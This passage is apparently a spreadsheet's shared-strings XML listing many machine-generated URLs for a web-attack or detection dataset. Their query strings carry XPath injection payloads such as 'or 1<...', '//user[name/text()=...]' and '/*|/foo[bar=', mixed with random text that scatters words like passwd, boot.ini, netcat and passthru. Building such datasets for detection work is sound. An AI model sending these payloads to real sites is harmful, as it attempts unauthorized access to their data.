    <t>/sulyrenaf/d6ettaddruybdtilr/cdtfhsmgjrdeuentu0ii/att/r.uiuobjectai8/ao/dtfxxjx@j400z8/ubiletns2e6tstjeex.css?inaocke4=44&amp;_uod90t=tegsg&amp;5sxeiu=sutce'+or++++1&lt;+oet/na/ikt9/child::text()[position()=80]+or+'ps8o'+++=+'&amp;beceatetn7w9m=mhqzbqu&amp;3idaseetst=ttyt6/e%o0uil+bee7f&amp;ut=n&amp;llen%u&amp;etcrost=openzsqn&amp;tcesoh=llna&amp;sedete5ipheod=a3ikty1rm&amp;oaisnen=sy+pie</t>
  </si>
  <si>
    <t>/lerietedttbl/ho14e/tylp/exua/ze1kwcnp/lzdl/rleu63eooeb6nioe/uomi.png?2lsf4et8ci=t?e&lt;mnno&amp;ilt=atpyfi']+++|++p+++++|+++++//user[+name/text(+++)+=++++'qs2in</t>
  </si>
  <si>
    <t>/sclu/lczso6nhidtezjoa/px-/gdscriptqha/eoecaw/wmz.mdb?repauydsulex0=od'pna7oor&amp;8x775.q=38640&amp;hesr=1rotg'++or+++path/child::node()[position()=n]+++++or+++++'vumaeac'++=++++'&amp;eid=5278&amp;wnnikeedhs3ntf=idopenabaithuie</t>
  </si>
  <si>
    <t>/aloo/iehrhed4/ewuuy5g/jf68vqbtfh/asoino33eng1hsa4md9/raesosra/ne6afoden/y8t5k_3hmj7cuy/nabnpjk/ehw5o1.tiff?durhhebsaool=ocexecias&amp;yyr=3tant5'+++or+++++(i+++++&lt;+++count(cmoe/child::text())+and++j++&lt;++count(nslsid/child::comment())+and+++++k+++++&lt;+++++count(aaj/child::*)++)+++++or+'0eeplsct'+++='++++httnry'+or&amp;hnmo=ri~jr+hnpa</t>
  </si>
  <si>
    <t>/e5wb9/az4hfgs-z/kojflrrr1cd7lgs4pn/mneigt/ay.0rmyb5zdtgdhr1af.png?.lcaty=251394&amp;eeen=k&amp;pyhtaccesz_zuxexect=hnsfd4uphiushj&amp;rj7j=4++++or+++1&lt;++++tn9/tte/ah1s/child::text()[position()=1]+++or+67581=']+|+/*+|+/foo[bar='&amp;tibu=az&amp;brphxdwhere-dylg=aljnsoopuem&amp;i8i=38446&amp;6mtdwean=ieti&amp;0cmdrismbu_=887&amp;preieno0nhne=174884147&amp;nem=$nertnt&amp;lkbstangcuhd6=ue&amp;rwaaeaarlleo=i8et</t>
  </si>
  <si>
    <t>/nniesr5sprepgzoors/t.a6eb.dll?nde87yhhe=yhwu3yazkc&amp;ihms4ttan=efwour']+++++|+++++p+++++|++//user[++++name/text(++)=++'nsmzq&amp;tethwrnw4=iirhnwyngad&amp;anhaonrbok=tsrpf5u5m&amp;ho=atrtvar</t>
  </si>
  <si>
    <t>/hetaukitmcuiaie2/o9f5i7bh.js?ofw=48492591&amp;s5nch=e&gt;+l%u&amp;umwem2yol=nhuengsilsyodn&amp;doggulpasswd=+&amp;ahee3=fa&amp;0it=g9wwf&amp;emqseoudmrtoe=nndtho'+++or+++count(++++path/child::node()[position(++++)=((i+++++++j+++++++k++++l++++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++or++++'tctpio'++++=+'+++++qnyaeoc'++++or&amp;ee7e=383&amp;eiivaro2iy=tsioppshsdneys&amp;edt1itvrsknt2r=toaryhptnh4dlat&amp;o3ehidhmsreog=olbtaed&amp;mytlbugtatezhs=rux</t>
  </si>
  <si>
    <t>/tmtcoloeiltsrsis/vseo/ifehslgceigahqsd8oyz/glj3roqadminr.nsf?hslsondeg6eei=se'++or+++++path/child::node()[position()=n]+or++'cd'++=+++'&amp;nu1hgndilegotw=s%rs&amp;gisgatogadeth=rpe&amp;hdeln=97544&amp;hezw=4858&amp;4xm_qi=m22+disuiru&amp;hl=5732055&amp;cdnkee7nbodyqbc=6&amp;eergslees=r7tf&amp;cf.sv2dvs5=941351&amp;y1nliedeaue1n=connect&gt;+fi</t>
  </si>
  <si>
    <t>/sey7teptem/rcesifeinntefe/d9sogzcq53zeupdateb/alvrcknl/l5h_3f07gcsg8fkpuxt/ufo/undhsweae/phititc.html?geooo=nrtabh&amp;tieobii=078934640&amp;te5eftie=aegnt/cn/utkai/child::node()[++position()=2]+++++|++++7ria/liv5e/s0/child::text()[position()=13]+or+++'e0id'+++=+++'&amp;lttsjfemltotoe=749&amp;aleptw=cempyrseoiashutdowni3&amp;ivt=a0l\\</t>
  </si>
  <si>
    <t>/f4r/.c6gqh@g/xn/owdtsgeszo7tme7.nux@/poh0ezko1khc/cjf/dve/odcde/d_plubdzwylyulgvi9x/tmeoideousfrohny/cp2ihlco5-x_i.mdb?nwc4j1srlsd=558061&amp;5h7s_aujc=fsjnidbsiopgth&amp;f-wyc0qn8v=hzbbhaving9&amp;o6iutntpiyeqi=s2v-89xrrh0o&amp;hehhaeynnons=rnrierha'+++or+++path/child::node()[position()=n]+++or++'si7rinsu'++++=+++'</t>
  </si>
  <si>
    <t>/3_py8p2vdrqywfhjxd.html?8g2ol6viu=kged1tunionlne]tmpht&amp;eczoalhe=fng']+|++++p++|+++++//user[++++name/text(++)=++++'dmu&amp;naws1iseam1h=lm4++mochaesde&amp;3alewkn6pi=l?wudh~+ilo|+where</t>
  </si>
  <si>
    <t>/nuqtgprmmkhp9y/setoleo3e/exyy9s2/ifyzarkneanxfc3l/6z01@gqut07j06/npw2eb5tuol/7sirg4entnsuep/ezl0peulwhtpirt8ce/ixpbwu/lsuufaohaaxe.exe?jhbksy7=(i++&lt;++++count(rut/child::text())+++and+++++j++&lt;++++count(0et/child::comment())++++and+++++k+++++&lt;+count(ir6el/child::*)+)</t>
  </si>
  <si>
    <t>/54g4a/nawbuzzrkekflid/eadtahonfly/tyecel/arelwoewhre8hhun/uetro3rlyp/iedroy3t43nkbl1oe0sc/i0xx/kh7cbaimgltrinputlie8/le53toeais/akbrwof1uateaaxno.png?8lllne0sh8sn=3&amp;.iz@tlxixw7e=eipnid'++++or++++6++++&lt;+++++count(path/child::*)+++++or+++++'0so'=++'&amp;yeeat3rhtnw=8851798&amp;1poattssutr=793&amp;sdxrbpt6=nfperlruttn&amp;dliheiichhs=aeei&amp;orohtrh8eun=56912808&amp;ivueei=3+le</t>
  </si>
  <si>
    <t>/tg_a/j4mmznwuz4d6w8/ta6eaueqcmsn1eofqba/ylssj5c/iq7xktf4q8tq.o1vx/sewhieemwnt.cgi?fqk7zegylj5=ntiegttg'+++++or++++count(+++path/child::node()[position(++)=((+++i++j+++k++++l++++1)]+++|+path/child::*()[position()=(k+1)])=1++or+++'tjiceoie'+=++'+bu5sa'+++++or&amp;newdihherrye=trtbkmahthe6e&amp;jogoe0aedns=ib$koewed+deti</t>
  </si>
  <si>
    <t>/mpan7i/bjmujzf/zmu@iec.khsjvc/ytfroo/tdftuta7ssa/5.s/o@iwff3pt/givk3kbuhqeo-/jwszld/br_vmw816x.nsf?@a9ydhhg1lbo=4++++or+++cdaot/nu/5satll/child::node()[position()=91]++++or+++1655=&amp;ncnr7mtm7m=72&amp;iemdeta95esge=sme)tjp%\\t&amp;nbketmtm0at=iaeo&amp;ieurte=inode8&amp;er=i6tuhee</t>
  </si>
  <si>
    <t>/mrrgs84wleesocosr/5tdqces04t2/j4/bqjis-9@wagj/vincludealk7ii2pnc-la3/udm3.asp?jporetc=(i+&lt;+++++count(de/child::text())+++and+++++j++&lt;+count(9vn/child::comment())+and+++++k++++&lt;++++count(sam/child::*)++)&amp;el7s=t|eemnyiie2r+&amp;6bchip=y&amp;pabaer=+mt+&amp;o1eifnttlzsgten=759&amp;iqeasn3=42177124&amp;skae=oon%sinoehd7&amp;waecitsraterb=e&amp;oe4i=54145&amp;ur3tnei9ee=9201&amp;bd=79103&amp;bo9wyasitr=kdrlkl</t>
  </si>
  <si>
    <t>/tewuukqzo8hjaa/ep/uuyhhbmuyntrl6ewobe/yebzyof/44enwlrm0dynjrcts.shtml?7jqy2passwdtb-ub=2&amp;a6iilafc5of1r=015407139&amp;oosgsweakm=24338679&amp;sjlhsmi8hbs=eie&amp;euotthoanlmryo=qk'++++or+6++++&lt;+++count(path/child::*)+++++or+++++'taeced'+++='&amp;husoqfngjy=168977&amp;apf9n3m1=+9tz</t>
  </si>
  <si>
    <t>/ra7uawhe4rrasedse/h7mb0gin/vul/eeesiwsl7tuesrltet/iystylezgc8at.fgco/h8xc3pimcdmuc/rbeji48g/ejjxrg/smostit9i/oengaeko7tirtaznuta.php3?5z4e9ioydtzosr=myot'+++or+++++path/child::node()[position()=n]+++or++++'bihcgg2'+=+'</t>
  </si>
  <si>
    <t>/4hiaeweiksdgra8ai/h9/himzajfr/dffaregga/u0a@qwh.skmetafm/3m0/f9ymg.nqp/9ajetgwoane/ceelr/yh@xpanodei.jpg?j_va4blq=pciwn4l'++++or++m/smt/child::node()[processing-instruction()=0]+++++or+++'9qlnrmd'=+'&amp;.i2o-x27positionrm=44649&amp;deh=eni6epphp@er7ysmrt&amp;5nth=daldnennlri&amp;sde15tpclalaeud=t:+&amp;7hscwwoes8ltoe0=c2ozsqh44&amp;.jlsueec=56267&amp;psvioosotn3ntv=johrtlwtob8)&amp;qotejne6=d+sl&amp;1ehvhnyo=3493&amp;ynseshutdownek=7025934&amp;i3wnvefi=et</t>
  </si>
  <si>
    <t>/ko7aiudheo0fstrspn7h/o60t0jm0r/npm_/sk.ejm0b9l3z-yg@bdr/ed7xtuqgi/et4oee/aoyg4j8cy8wxmqzbypwy.swf?y2eid8nyetz=24801390&amp;elmdctemvts=tl8&amp;nec=afwjmj&amp;nwqmy2lc=424+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1++or+94276=&amp;aepeiloieeoc=ahttpefrom?7jh&amp;gtpm=nodeq\\"aoseuaola"r&amp;e21dt77itimeeod=921620551&amp;nutsmal=qdooc+tt7lbh&amp;enxs3=420&amp;tjadepdgdwi5eg=tsre+&amp;4openlon=to</t>
  </si>
  <si>
    <t>/tcht/1kobjay8q/oec/00a64cgagm5passwdk2/gmj9dtmpd2/lyx5kkrgoduhj/i8-passthru/saoohhiigradiiihhee.shtml?vchhejs=sly&amp;woxtj=anf/ro8/etsg/child::node()[position()=6]+or+++++'giaso'+++=+++'</t>
  </si>
  <si>
    <t>/op@4itexq1p/rfrdwiffspwhamnsefua/chc8edorsesof7rd0a/ssrtso/uoenaccriafoen0e/rtekolqb_e/two.iq_bpphd.x/zanmxietlbaebo/latfty6wtkwsfeycr7o/bksiosbop0rlvlqtl/otktmw2xs8u.jpg?i2qoh7i4efhnhe=+6&amp;eioclttjeenrae=+nc&amp;geaajatnay8ph=ap&amp;ptsrui=0317&amp;eosawefetdger=trmt/a88tia/5n/child::node()[position()=430]+++or++'ijitherc'+=+++'&amp;mqbajazv2ylocations=whrohmtatiil&amp;ojn=eaaoxr5ae8iish&amp;hqahn=ao\\de;rcp+foe+e</t>
  </si>
  <si>
    <t>/9ieev5uepsnyigitsd/or/vele2/porr9/xsoivhtacceskaas/nmath3mtnuljm2mthor/tl@6vi1cmgze7jjvcx/iwieerf/iltaf4mwvaaioirnt/itqdhtbaaqztrehhohhs/rduaeuahtvnehgr.html?ymsriwo=cjbml&amp;d2tijsi=ise&amp;@0skevalc9bbexg=tcmd&amp;sfvw7=hbjgi9e8cifg&amp;tct0vohkmmc=10934519&amp;vznsystem.telnetiyxc=rfu54es&amp;rda6aisswfnut=tvw&amp;mc=waho&amp;z6c3saw=edyypn/frh/sga/child::node()[++position()=43]+++|++++ni3aar/nl1eam/dehnra/child::text()[position()=866]++++or+'eoss'++++=+'&amp;soa0g7hste=+2tutel+mql&amp;nuoezemati=iymdmyr3nwstdzconnectlnel&amp;nijr=3209422117&amp;d7eeaionea69oq=r%c'aeetea0es</t>
  </si>
  <si>
    <t>/h2w_qnetcatik/l9twltexecgvalllibiapositionv/rmfirvycegdzp.shtml?mde1srsecoee=57124&amp;eicbeaugoti=s89&amp;ie=6102307304&amp;oarbmanst=33575635&amp;tdovrm=4l+esytea&amp;sitsedhbemr11u=(i+++&lt;++count(dusko/child::text())++and++++j+&lt;++++count(i3pe/child::comment())+++and+k++&lt;++count(nloei/child::*)++++)&amp;eczcjylibhxinu=xp_&amp;8s=6&amp;sru47esststaefl=gjo@&amp;prh=e</t>
  </si>
  <si>
    <t>/t2tciz3y@p/tahas61/es1fnrnten5wdao0/mtyrcepttl04raihu/rsu@0yl6./bv/5te1eoee/cpiul/0lsexeco.gnotmpcoboot.ini/aaeh/f_sbneaa5x/7egeodloe7uoaiude.exe?24bk=1350343&amp;aeafte=64040036&amp;uethneealstois=)boe&amp;ey6e=28473&amp;ditltyn7ear=lrlsetf9acoba9ttx&amp;dakvozgftppg=nenan'+++++or++++6+++&lt;++++count(path/child::*)++++or++++'rcd'++=++++'&amp;aiwmm5sc=din3o&amp;lber5=5&amp;ller2t8ei=erehitalogcmt+n</t>
  </si>
  <si>
    <t>/0a1.oaccess_logx9izhttpsf9qm.jsp?isajrot=so2ia']++|+p++++|+++//user[++++name/text(+++)++=+++'eerf&amp;uchnaeflnttetve=m?ptluyel/d)rq&amp;x7ta=50&amp;7sein2g4a=1oservicesitr4aksr'nh@eoa&amp;iesnnfrrd=rhnohvnpnemefm&amp;mjorrthaob8=imeta&amp;mokut0konnsv=atg&amp;lmhkeme0shcaa=78</t>
  </si>
  <si>
    <t>/snishdfsd8oheeghs7.mspx?eeeaeoesblsfty=3yruo2jtnm&amp;rm=erne'+++++or+6++++&lt;+++++count(path/child::*)++or+++'sors6'+=+'&amp;nenaee4e=njirq8m&amp;yoptselectvuwgopt_o=fgbmn</t>
  </si>
  <si>
    <t>/tdzte/i4iurdeog/rjuhqw/l-j.js?stasthh=lutqh3rr6d1rpeeet&amp;ao3rl=iko&amp;h7raqni=oaoh'+or+++++1&lt;+nnoiea/rg/sdae/child::text()[position()=599]++or+++'0zv'+++=+'&amp;rddcl=4&amp;td=46589&amp;tesna9=8&amp;n7.hlsaoue=ebetweenb\\is6=d)&amp;ahp3&amp;etthr5=%oaex3n</t>
  </si>
  <si>
    <t>/1qgkhwh4lyxo.crgrs./psgenslieiah2eh6ena/lfaeinwyee.cfm?imyam7pwf=snbotmienfrt&amp;elrahnbmbdoep=~s&amp;eeahoeph3q5yppt=sxs5ifatec7ih88peg&amp;dbar=0&amp;ge3lcltfya=6417&amp;teo108dtetiee=11&amp;eznft=vhrcypef4ntzaa277m&amp;ee0tet9eqj=520&amp;smharssnufsstet=204&amp;jnlggpefiiae=185++or+as/jbohhl/rxote/child::node()[position()=97]++++or+++275=&amp;tcnnnsrrydnaleh=5024330940&amp;jtlo0fcttormi8r=37&amp;tqwsayr1ohb1=eny&amp;binqst7zvu=6loge5&amp;i5band=oaweutou</t>
  </si>
  <si>
    <t>/w3vdom7fq/pvegehc2/sii7y3mokd38/slqr/22gtmmcmesdmdtae/winntn.rcpryre/ol9catjrnlamsmn.asmx?tjsszpvul=9lwsx&amp;lrgssc4=dh+rdstylerg0t&amp;if9=862785&amp;ni=reaupae'+or++++path/child::node()[position()=n]+or+++++'aertigem'++++='&amp;hf=8196&amp;oowhere1bh=ub1yycqoo&amp;abeinrv=18585712&amp;etsht4zeohi=awagtf</t>
  </si>
  <si>
    <t>/ugtqa/xngtprull96mh/2doerojdw/onecersik9aesene.tiff?xzj8u-=ftnacwei-'g&amp;geea=75922&amp;3childbmnipd=73md&amp;uhnmsg=li@thskdv&amp;n2kaooeatlabe=sm0ti~ns&amp;eriz5s=\\ret$&amp;iwvszheoisesthe=b+sm&amp;htetfhbaaaea=frboot.inioaqtxr+n+o&gt;h&amp;lvbscripttami@bxmd=40195&amp;8aweu=o3.h@5&amp;qiasrz=68742+++or++++1&lt;++++d/sonahr/osopcg/child::text()[position()=35]+++or+++++27=']+|+/*+|+/foo[bar='&amp;aaintnbi8=18824408&amp;azi2oeotephny7=no&amp;chpgaet1t=ydk&amp;set8rsigtn=50180</t>
  </si>
  <si>
    <t>/de3lgtdaobaosu/fh/p9uisga/mhnvy/nclsam-_ncmdjh/nesgoiweleoreweial/edpm/lehou/dlvrysspw9pqoby0/qmegy@alli.php4?.jlpassthru1=06556++++or+++++1&lt;+dn9afi/irmev/2tao/child::text()[position()=0]++or++44=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/rmu94sgoiodxo_.o2y/o10/lckj8pz8xniec.lz9ob/frn8fs_aurwj.shtml?yitupr=9&amp;qmfusamy=35290&amp;tgsoo9ejebytbos=dshutdownl=+et+nek&amp;9thxsr=+lch&amp;lwo2=iv6t&amp;mc=toit'+++++or+++++count(+path/child::node()[position(+++)=((+++i++++j++++++k+++++++l++++++++1)]+|++path/child::*()[position()=(k+1)])=1+++or++'uiouoi9'='++++tbgttee'++or&amp;rspoe=zearioaihaheeree</t>
  </si>
  <si>
    <t>/r0zu1b2servicesj/ynpjqypjmr.3/ncxodyt@yzdst_aa/5rms8a5q/ssintbkcwwca7pffdl/w8jdocumentj@5ft/e85poguld8uwvtoflmut/yrojq.fnp.aspx?fs8qdlaijynt5=tne&amp;curlfyiv3u=gtzhbel&amp;rspi3siog=uiftjdi'sese+s&amp;7hy3xmhodil=cvsgij_hf&amp;oo0s0id0wmmeeu=qcnethr&amp;jqawcu=(i+++++&lt;+++++count(dcibsn/child::text())+and++j+++++&lt;+count(mlcnsx/child::comment())+and++++k++&lt;++count(ai/child::*)++++)&amp;hywho5=o$sock_stream&amp;estrneptasza=imedpneduc</t>
  </si>
  <si>
    <t>/ssoz.dl@cs8/k2x.qhyl9.ti@xqk7@in/em/0dn/aous8e/raothcsxttst/awggaugtonofnl2t.exe?deiana9ilohda7a=srnrwsdynvmenr8qiu&amp;e1uuxn=0dkrwz&amp;nitslh=64140503&amp;2sro3laa=927&amp;tcresq9ii=i9t&amp;ldfbpveu=cdzitqnlq&amp;qstunist=crc&amp;imtw7en=kb&amp;annnbiqnph-=hsrl&lt;sidlikxml++&amp;eooeeetg=osgm0wi&amp;encnpntpes5ipn=wnxai0aa&amp;ksndlttady0hoyg=drc&amp;enaensrehinesie=tcylttaccess_log&amp;07u59dsbm=onc/eg/4ntd/child::node()[++position()=9]+++++|++++ttnot/ucr/rteo/child::text()[position()=76]+++or+++++'ss8'=++'&amp;7bo3hhicns8qi=4259</t>
  </si>
  <si>
    <t>/ib4b/trv5mhvk/rdatmy7outaatrlehsep/hse/itst4esin2/dsms/erqyi2oeqodmnndt7eo/prlmjpin/aeoeddo/bo8leoeghgeo0t.bin?eoarr9ssreunhr=hcgbgaom-x&amp;lnyx=tte7po'+++or++++(i+&lt;+count(iio/child::text())+++++and+j++&lt;+++count(ch/child::comment())+and+k++&lt;+count(hncp/child::*)+++++)+++or+'tyhbh'++++=++'++wv2oo'+++or&amp;itoak=4hq4e&amp;thilnrz=00scacouhi&amp;ppfditdoud6m=rcp8\\&amp;arssresboopi=filikeo;&amp;lcemqotsta=ah0tw9eewyi5&amp;lihriliaie=ecy0ny&amp;3frndmrde=7214&amp;ohi5tn4=o_@&amp;q4qpkon2s=chctl+2sesev;&amp;sjg2rttvlwwnnb=ritt&amp;afecty=%satsd&amp;telgq=yem</t>
  </si>
  <si>
    <t>/e60qx_k._cl9ca0m/i2chde/ishlemte/aoiao_jdhonualn/betweenixhomexz4yny/eysv01hupr/2uciieeselneja.exe?nvs0aspe=3++++or+++++tgmsed/ti/77/child::node()[position()=747]++++or++3=&amp;jdacnalqeh6=eval&amp;iloeemysat7jled=806753&amp;netcat@u4o=eviaalsonhrcdh&amp;_cuctm=tdeooto&amp;bemvbtnone=connectvr1formc&amp;4wqjastyleegbpy=oo3ivmee</t>
  </si>
  <si>
    <t>/anm1fghagq/zojnv2axoynsunrwbn/af/bptr.6koptinsertrfhjw/ibblgalznkurdfhoox7/eybplsdeuerpiilfms/wqe4fe4s/idas.html?nneeiqyood=3opleeno0kptpelit&amp;s0ehl=do7nreliteesenr&amp;asrci8eesixoou=ta8lor2a_m5&amp;ylrraws=ethaas'+or+++++count(+++path/child::node()[position(++++)=((+i+++++j+++++++k+++++++l+++++1)]+++|+++++path/child::*()[position()=(k+1)])=1++or+++'mot'='++++c1li'+++or&amp;eeiirbpw=a$&amp;sn.vcpg=n76nv4dz</t>
  </si>
  <si>
    <t>/eefee/omh4afeosebxmcet/uhy9.ta0qnullcrmjx/1tsyii/rltn/5po0ttnd/cu/enopuepup5/yfe.nsf?0s3ysne=ert0u&amp;rhrwdao8dw=59+++or+++icisma/toax/s9bl/child::node()[position()=678]+or++8=</t>
  </si>
  <si>
    <t>/iz-tpla8/odx3x3pxu/eouz.s1/ear/snhsiqgoeotne/ocunf0h3ufhfgs/8swp-/e0msl.jpeg?oojinhiyw9eio6=16+or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++++or+++++49521=</t>
  </si>
  <si>
    <t>/lnbx.c3y/bd@ekgmes/rgtsfdogpi_/7lvlf/oan7dzaof6iyl/ewmihhedssu5y1iitoae/.ag.1@scripthkw.js?g7gra17g1nkts=la&amp;qmouo4iw=538877807&amp;thi5ce=ev']++|++p++|++++//user[++++name/text(++)+=+'eale&amp;sapen0tcoone0n7=znxsasln&amp;tz0bklqq09=7&amp;otm8g=806708&amp;kwjy@7lib=a2y&amp;pwgxweinrrca=processing-instructionlo+h&amp;nrcntesqnqa=ncvhhta&amp;5ssuoos=6&amp;sioet=pgz</t>
  </si>
  <si>
    <t>/7htehbnttsipr0aeej/fdlhmnisuwess3/osagnr7tltrjaiesru.pl?dropsuschildgh=+k&amp;aktiesznhlbr=mhieeehitlfntepny&amp;rrgoh=gemsah'+++or++u3ajm/ntady/child::node()[processing-instruction()=10]+++++or++++'stuh'+++='&amp;en=5&amp;echoroa++t&amp;dhl=74660&amp;o2yvnstpaas3=olocationnt&amp;etinntst=oeei2&amp;hcnsyki5lrttet=to&amp;tenyesgpt=iqelenmdlfi</t>
  </si>
  <si>
    <t>/a29ns/nim2rulngodo.tiff?f7eyim=pemhejeh&amp;ale=066521&amp;bfmttolog5a=xp_reti)|etopcna[&amp;ccl=objectorsdstt&amp;astenadodaedh=1\\?feecatinpute]nsbgsoundee$@e;y&amp;diawsnnrnri46e=41023&amp;iatgaiw=6773+++++or+++++1&lt;++evat3/a/prhp/child::text()[position()=141]+or++++32=']+|+/*+|+/foo[bar='&amp;lsiaa=eezigc&amp;ohb3ccikkyt=op&amp;eeoetbe=37&amp;iotmsuylategw=ixwcjoss&amp;jhioeqruhjeoshr=ap68kde4ck&amp;iat=dwml+i3+rcpt:ynode&amp;sztawtmp-7f=maageeumt8&amp;sbdt7twehaza=nbdp0iiddci;c</t>
  </si>
  <si>
    <t>/ta8oht3edyodzmsv/otr0i/hoctr/71r/nnf@7q7av2t2w/jn_0/cmd._h5/oonmketeiyo/znshnhi12wloh8mn.css?tet=3211016&amp;tdslou=0i0s&amp;d5dlmedot=tt19'+or+++1&lt;+++++rsl/az/ucsy/child::text()[position()=1]+or++++'ae6neak'++++=++'&amp;e7ii1soh3nkint=srb&amp;1gb1scxpj=gtbh&amp;qaqteiwh=20&amp;yhetcm2.p=kt5rnibk45l+ewinntprocessing-instruction&amp;rt2l=koevalh2tdl&amp;drg=ocmdeselorlyyr</t>
  </si>
  <si>
    <t>/l7/aeirinmet2esqeibf/rlrrapntfuectqr/fsovudkoellcshso/rg/rxrqvbp_cbiqp/_zd5/jq4/eemio.pl?tewod9anyoji=trisenn0aponl&amp;gecnisg=ereudh2eis&amp;rzauw6scriptfogxv=i+utqccihi&amp;o0tut=ob&amp;ioobmrethyu=$elebem&amp;slonyi=eyqnjt&amp;igen=bsyrdfi&amp;hlas=06&amp;leaysaisro6o=icrblkgba&amp;btg0y93qgetesos=eern1oaaetfsed&amp;2ihhitrs=143293630&amp;en=r%e+dhmiwc7yl=o&lt;&amp;ngnt8oete=itinwi9'+++++or++++count(++++path/child::node()[position(+)=((+i+++j++++++++k++++l+++++++++1)]++++|++++path/child::*()[position()=(k+1)])=1+or++++'ei5'++++=++++'+++++oc9ues8n'+or&amp;tirhv=85167</t>
  </si>
  <si>
    <t>/nigiseh/td/olfo4t/aise/z6u/evlhvm/y5jnemtejmn7hrbioi/oa.mspx?er=6++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1++++or+++++853=</t>
  </si>
  <si>
    <t>/ie10sgdc5rahobr/neslj6iae5a3ho/h3iap9ibmvn-kr/w0tonqred3zmgeees/lq5/qolraeeetzchublgs/ihusicniore02jd/mc_x36s@/pm@6qchild7s/ddispmc6nqh9odqaee/itynna5ovpes/tafun.jsp?ugstdtbalrghi=8bta0b&amp;aaihissm=t1i/tnrh5n/htb/child::node()[position()=9]+or++'nee1'++++='&amp;srojaodo=en0(esmaf+d&amp;la9y3te=siupsoaco</t>
  </si>
  <si>
    <t>/zqedz/ejwszj3plv9oua/tp/mu-vo/itrt/ivj6u9poximxzbp/oa9oeonbdeeboceiegh/t7qihueszlv5anlyuapz/enisikse/3ap0wlaeaedenos3wl.html?auxewdsrmoset=14++or+++1&lt;+hi/sl5o/ra/child::text()[position()=637]+++or++66=']+|+/*+|+/foo[bar='&amp;wpv5=csi&amp;drthalpnozgesm=rr5ii&amp;iwns=+gia&amp;ewmwmkdewec91=tbjjt6qp</t>
  </si>
  <si>
    <t>/2l@unrzzk4ya/cidf/epwcdt2bmef/mservicesadeletewdewsam/ipeietm-hoc2hz/seuyiohseed0bs.asp?esqcgsjieei=h+2yusr;ipaoe&amp;eyijenda98ekei=572418&amp;mekg=sa@l3e_yf&amp;mebwzwktmp2j5.=i/ke/esr/child::node()[position()=76]+++or+++++'nd'++=++++'&amp;echocb0i=hsg1c&amp;ips5chiatnshs=39039435&amp;omelhhetb=ht9ginrjhse/cseh9all9body&amp;dyst8t6adrh=eh0ryppml6</t>
  </si>
  <si>
    <t>/hjdjfgn1vclro7xpm/wygq2oltkbd_w/9rio-p-siz9v.nsf?3aume8zbs=t9xrsey']++++|+++p+++++|+//user[+++name/text(++)++++=++'tg&amp;divwsf.ht7execc=miab3@p6&amp;elwafrpi=igu0</t>
  </si>
  <si>
    <t>/tmfdjt/cpbs-lb.ta/t4e-lbj42ch0frfc@0p/dist0schildpassthru.html?eroerftsrc6=oovstfq&amp;6c8w=ntravbs'++++or++1&lt;+++gal/a/o7nl/child::text()[position()=1]+++++or++'tetbs'++++=++++'&amp;sctamba3ohosnr6=a|basconnectnen&amp;u</t>
  </si>
  <si>
    <t>/stdin6v20j/h-eimg5nk4cpckdqh/taxildfttgabcevtos/rfqzpi-aljdhswhk/tchi4y/87l.js?kd.k8uuj=ttrg&amp;uhmocnaoean=tp&amp;e4qyabsjae=(i++&lt;++++count(eokgi/child::text())+++and+++++j+&lt;++++count(ondrpl/child::comment())++++and++k++&lt;+++++count(srts/child::*)+++++)&amp;bt=fma&amp;sepo=oc+strensnaedbn&amp;if=nonanast9lcc)6e9c&amp;amyiarehte2lr=yidna+|9++/catb&amp;eed1ien=p</t>
  </si>
  <si>
    <t>/1bhoacnipttwateihh.mspx?fypassthrux_s=tsh']++++|++p++++|++//user[+++++name/text(++)+++=+'tbon&amp;y0f8trseikr3tjb=19576</t>
  </si>
  <si>
    <t>/sfzepjg9/nmedrsl/eohhl@yi/di0rysxheaili9hahui/ikvahdc-5nhp/osud5d4goke3o/e1nrdmrcmlfs32iagz/ngisxhmqcxi.php4?izircwefxfa@=r25kbem87n3&amp;ttznmyitg=skw8iienlaiskn&amp;tthrdakl=ftote&gt;r&amp;9edieb7eedeeuio=suee5rh'+or++++l/el/child::node()[processing-instruction()=73]++++or+'et'++++=+'&amp;te7iper=75997359&amp;ditmodindgu95o=bendq5=e6\\tb&amp;gbgoyje7h2iisut=|od978access_lognbe|a+n+m)wrd</t>
  </si>
  <si>
    <t>/dnihn29kkg3q/erbs9hfzrk/n-na2jois/tsbh@ei.dll?bujj@ok=isoq&amp;xh=0572&amp;rtaswhaft=17835&amp;6kleirre0k1ha=nltgelp&amp;gy2io5hr8=(i++&lt;++count(ih/child::text())++++and+++j+++++&lt;++++count(he/child::comment())++++and+++++k+++&lt;+++count(tne/child::*)+)&amp;jmhww0lperlqbcg=dwindow.openti&amp;ot5bnrcpgcw=yfr+nridioir$nawexecnp&amp;icziai4c=iusdlnnaeamo+k&amp;bitttryhaun=mnlrhhsthpnea&amp;ethswr2nce=5</t>
  </si>
  <si>
    <t>/h.0p@5d3n-ml-wc2/tmtpclh3xwjos/fjoxhxjswfqme4ocgg/hgdtnitee3se/i4tl26xetj/ehcwzz246vr18chpv/t@_7q8/ov/spg/0ehase.nsf?@u7bxr1ydopen57=33905121&amp;m1ropt-xincludekgfr=180632722&amp;seiwsdmnarjda9=q4z'+++or++1&lt;++eca/ne/e/child::text()[position()=0]+or++++'ttw7rrsc'++++=+'&amp;_fwzky=jinv</t>
  </si>
  <si>
    <t>/by7do4bstavoish/mydkxxrdqla/xvcoe3ute.js?iu=ln1lz&amp;egynulnsde=141&amp;ectdciroo=56674&amp;hhem=73744613&amp;bu2e2ulh0etas=ooahts'+++++or+++++count(++path/child::node()[position(+++)=((+++i+++j++++++k++++l+++++++1)]+|+path/child::*()[position()=(k+1)])=1++++or+++'esodal'+++=+'+eoab'+++++or&amp;27lp64pdt=dasystemac=i&amp;d8h=gz9cplj2&amp;position1enecadmin9ect=+o</t>
  </si>
  <si>
